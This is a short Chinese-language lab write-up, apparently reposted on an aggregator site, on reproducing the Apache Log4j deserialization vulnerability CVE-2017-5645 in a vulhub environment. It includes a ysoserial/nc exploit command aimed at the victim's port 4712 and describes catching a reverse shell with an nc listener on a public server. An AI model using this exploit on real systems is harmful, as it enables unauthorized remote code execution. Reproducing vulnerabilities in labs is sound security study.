Apache Log4j Server 反序列化漏洞(CVE-2017-5645)

Posted 風月长情

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Apache Log4j Server 反序列化漏洞(CVE-2017-5645)相关的知识,希望对你有一定的参考价值。

文章目录

一、漏洞介绍

1.1 漏洞介绍

  Apache的一个开源的日志记录库,通过使用Log4j语言接口,可以在C、C++、.Net、PL/SQL程序中方便使用,其语法和用法与在Java程序中一样,使得多语言分布式系统得到一个统一一致的日志组件模块。通过使用三方扩展,可以将Log4j集成到J2EE、JINI甚至是SNMP应用中。但Log4j2.8.2之前的版本中存在反序列化漏洞。

1.2 影响版本

  • Log4j<2.8.2

二、漏洞复现

使用vulhub漏洞环境复现

》》docker中启动漏洞环境

》》nmap探测对方端口服务状态

》》准备一台公网服务器,开启nc监听(用于探测漏洞)

》》使用ysoserial生成payload,发送给目标服务器的4712端口,使其加载执行代码

java -jar ysoserial.jar CommonsCollections5 "(Payload)" | nc VictimIP 4712


》》成功拿到shell

如果接不到shell,尝试关闭防火墙

三、防御措施

  升级Log4j到最新版本

以上是关于Apache Log4j Server 反序列化漏洞(CVE-2017-5645)的主要内容,如果未能解决你的问题,请参考以下文章

漏洞情报 | Apache Log4j SocketServer反序列化漏洞(哨兵云支持检测)

如何缓解 Apache Log4j 反序列化 RCE (CVE-2019-17571)

Log4j反序列化远程代码执行漏洞(CVE-2019-17571)

log4j反序列化漏洞详解及利用

log4j<=1.2.17反序列化漏洞(CVE-2019-17571)分析

漏洞风险提示Tomcat Session反序列化代码执行漏洞